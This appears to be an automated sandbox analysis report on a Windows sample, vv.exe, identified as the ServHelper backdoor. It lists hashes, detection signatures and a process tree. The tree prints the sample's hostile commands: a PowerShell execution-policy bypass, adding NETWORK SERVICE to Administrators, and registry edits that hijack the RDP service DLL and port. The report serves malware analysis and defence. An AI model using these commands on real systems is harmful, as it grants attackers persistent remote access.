Analysis
-
max time kernel
76s -
max time network
136s -
platform
windows10_x64 -
resource
win10-en -
submitted
10-09-2021 23:52
Static task
static1
Behavioral task
behavioral1
Sample
vv.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
vv.exe
Resource
win10-en
General
-
Target
vv.exe
-
Size
4.0MB
-
MD5
9cadcadb612787dc6c2e9901ffe49dec
-
SHA1
dfaeffadd7767ea23cabc31a59ae2cd461abf00f
-
SHA256
6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb
-
SHA512
e7d908a73e85965359169b9d3e14ec3f1f81218354aa09a8d6c027be230e30c4f334122b933579ce6ad35e5eaffc01c6d8124e5f1a11671b7f6b36549d55beff
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Drops file in Windows directory 8 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 4680 powershell.exe 4680 powershell.exe 4680 powershell.exe 5036 powershell.exe 5036 powershell.exe 5036 powershell.exe 972 powershell.exe 972 powershell.exe 972 powershell.exe 688 powershell.exe 688 powershell.exe 688 powershell.exe 4680 powershell.exe 4680 powershell.exe 4680 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 656 -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4680 powershell.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeDebugPrivilege 972 powershell.exe Token: SeDebugPrivilege 688 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
vv.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.exedescription pid process target process PID 4564 wrote to memory of 4680 4564 vv.exe powershell.exe PID 4564 wrote to memory of 4680 4564 vv.exe powershell.exe PID 4564 wrote to memory of 4680 4564 vv.exe powershell.exe PID 4680 wrote to memory of 4876 4680 powershell.exe csc.exe PID 4680 wrote to memory of 4876 4680 powershell.exe csc.exe PID 4680 wrote to memory of 4876 4680 powershell.exe csc.exe PID 4876 wrote to memory of 4904 4876 csc.exe cvtres.exe PID 4876 wrote to memory of 4904 4876 csc.exe cvtres.exe PID 4876 wrote to memory of 4904 4876 csc.exe cvtres.exe PID 4680 wrote to memory of 5036 4680 powershell.exe powershell.exe PID 4680 wrote to memory of 5036 4680 powershell.exe powershell.exe PID 4680 wrote to memory of 5036 4680 powershell.exe powershell.exe PID 4680 wrote to memory of 972 4680 powershell.exe powershell.exe PID 4680 wrote to memory of 972 4680 powershell.exe powershell.exe PID 4680 wrote to memory of 972 4680 powershell.exe powershell.exe PID 4680 wrote to memory of 688 4680 powershell.exe powershell.exe PID 4680 wrote to memory of 688 4680 powershell.exe powershell.exe PID 4680 wrote to memory of 688 4680 powershell.exe powershell.exe PID 4680 wrote to memory of 4536 4680 powershell.exe reg.exe PID 4680 wrote to memory of 4536 4680 powershell.exe reg.exe PID 4680 wrote to memory of 4536 4680 powershell.exe reg.exe PID 4680 wrote to memory of 2732 4680 powershell.exe reg.exe PID 4680 wrote to memory of 2732 4680 powershell.exe reg.exe PID 4680 wrote to memory of 2732 4680 powershell.exe reg.exe PID 4680 wrote to memory of 4100 4680 powershell.exe reg.exe PID 4680 wrote to memory of 4100 4680 powershell.exe reg.exe PID 4680 wrote to memory of 4100 4680 powershell.exe reg.exe PID 4680 wrote to memory of 2392 4680 powershell.exe net.exe PID 4680 wrote to memory of 2392 4680 powershell.exe net.exe PID 4680 wrote to memory of 2392 4680 powershell.exe net.exe PID 2392 wrote to memory of 2396 2392 net.exe net1.exe PID 2392 wrote to memory of 2396 2392 net.exe net1.exe PID 2392 wrote to memory of 2396 2392 net.exe net1.exe PID 4680 wrote to memory of 2712 4680 powershell.exe cmd.exe PID 4680 wrote to memory of 2712 4680 powershell.exe cmd.exe PID 4680 wrote to memory of 2712 4680 powershell.exe cmd.exe PID 2712 wrote to memory of 2176 2712 cmd.exe cmd.exe PID 2712 wrote to memory of 2176 2712 cmd.exe cmd.exe PID 2712 wrote to memory of 2176 2712 cmd.exe cmd.exe PID 2176 wrote to memory of 880 2176 cmd.exe net.exe PID 2176 wrote to memory of 880 2176 cmd.exe net.exe PID 2176 wrote to memory of 880 2176 cmd.exe net.exe PID 880 wrote to memory of 4732 880 net.exe net1.exe PID 880 wrote to memory of 4732 880 net.exe net1.exe PID 880 wrote to memory of 4732 880 net.exe net1.exe PID 4680 wrote to memory of 424 4680 powershell.exe cmd.exe PID 4680 wrote to memory of 424 4680 powershell.exe cmd.exe PID 4680 wrote to memory of 424 4680 powershell.exe cmd.exe PID 424 wrote to memory of 1040 424 cmd.exe cmd.exe PID 424 wrote to memory of 1040 424 cmd.exe cmd.exe PID 424 wrote to memory of 1040 424 cmd.exe cmd.exe PID 1040 wrote to memory of 1180 1040 cmd.exe net.exe PID 1040 wrote to memory of 1180 1040 cmd.exe net.exe PID 1040 wrote to memory of 1180 1040 cmd.exe net.exe PID 1180 wrote to memory of 1268 1180 net.exe net1.exe PID 1180 wrote to memory of 1268 1180 net.exe net1.exe PID 1180 wrote to memory of 1268 1180 net.exe net1.exe PID 4680 wrote to memory of 3920 4680 powershell.exe cmd.exe PID 4680 wrote to memory of 3920 4680 powershell.exe cmd.exe PID 4680 wrote to memory of 3920 4680 powershell.exe cmd.exe PID 4680 wrote to memory of 3948 4680 powershell.exe cmd.exe PID 4680 wrote to memory of 3948 4680 powershell.exe cmd.exe PID 4680 wrote to memory of 3948 4680 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\vv.exe"C:\Users\Admin\AppData\Local\Temp\vv.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kgvouvyj\kgvouvyj.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2CF1.tmp" "c:\Users\Admin\AppData\Local\Temp\kgvouvyj\CSCD7C6624F86EE4BDA8EBC4BF80405E2C.TMP"4⤵PID:4904
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:972 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:688 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:4536
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:2732 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:4100
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2396
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:4732
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:424 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1268
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:3920
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:3948
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
f3068198b62b4b70404ec46694d632be
SHA17b0b31ae227cf2a78cb751573a9d07f755104ea0
SHA256bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
SHA512ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795
-
MD5
0c1706617cf3eeb18e8c85e95bdb1bb3
SHA166733a046d944633d1d83fde85e6a8c91f1036e3
SHA2560b34328a2d7312b47ae018d53905153993467f317bcad7882cb0f6e464b9adbf
SHA512501d02068a979a700f050b3c836f6eab1a6d988278e98387c666379ed2a4198d3f03524601d94856371b94c183032874a470b60581639d167995f2954b5d267b
-
MD5
30303b0cc1d6833b7dc84fbb907822be
SHA1caaa99bb9a56a6974ba16fce6e01f4f95016b9f5
SHA25691b6b2284e42eb7bdf6371fcbaf1724027fc600cd9bb56ed81f2f7d8c784f617
SHA512117cb2e2c687d2cca1c069151df4c085dcb4a88e51b1f17b8b0e2f9ce1adf181ed76b8cc1c262bee45e34d7a8b513d5bf19a50f394064cf5c132fec23a6fb7da
-
MD5
915f462c0b74d10e05ee71dd96356bde
SHA166c1aeb1f35fa9f12804fe683963974824f20de5
SHA256d7004d973db948e5aba372def2ee81eb663e4dc4d8faf287fb1aef5827fac850
SHA512a65e87e0df1b501a8a863c4f327d4077e720ace354fab155af5eb521a27f55039cbfd481ae02cc5ac93f7a9c77f2fc29ebd8f7463dda04556c97c328ef4ac11f
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
c96cde0e70844a4d61e739eda88b91ae
SHA16f819dcfcb8c1c68603fd066c48e3305e7bd16f9
SHA256a03b73546aac9b7f78edb6597341e6c291ffdbf4eb110a45f0a1afaa045481bd
SHA51276b745c7b8e97dd47fe3f32060bce86fb35331ff5608be6d33fb1704182df78349abd3a9eb12246e95aba6d97157f6571b772c25e4b95c363c8eac207869416a
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
1bdb829417a8b8520f128b50c3ee7366
SHA13ef871aa8b0e561a921bd5c2272a490d1eaad8db
SHA256208abe1d06bff3d7723096e72196881c16b8b5157ac8d605c2076b5457af02ee
SHA51265239ac1d2a0db19423b028e2e410e79af7b5a7c65ba963a713b540c53cbc15fa30e967a40c8b4c26b11944033a41b64e709109d406dd63a5debfbc3d220804b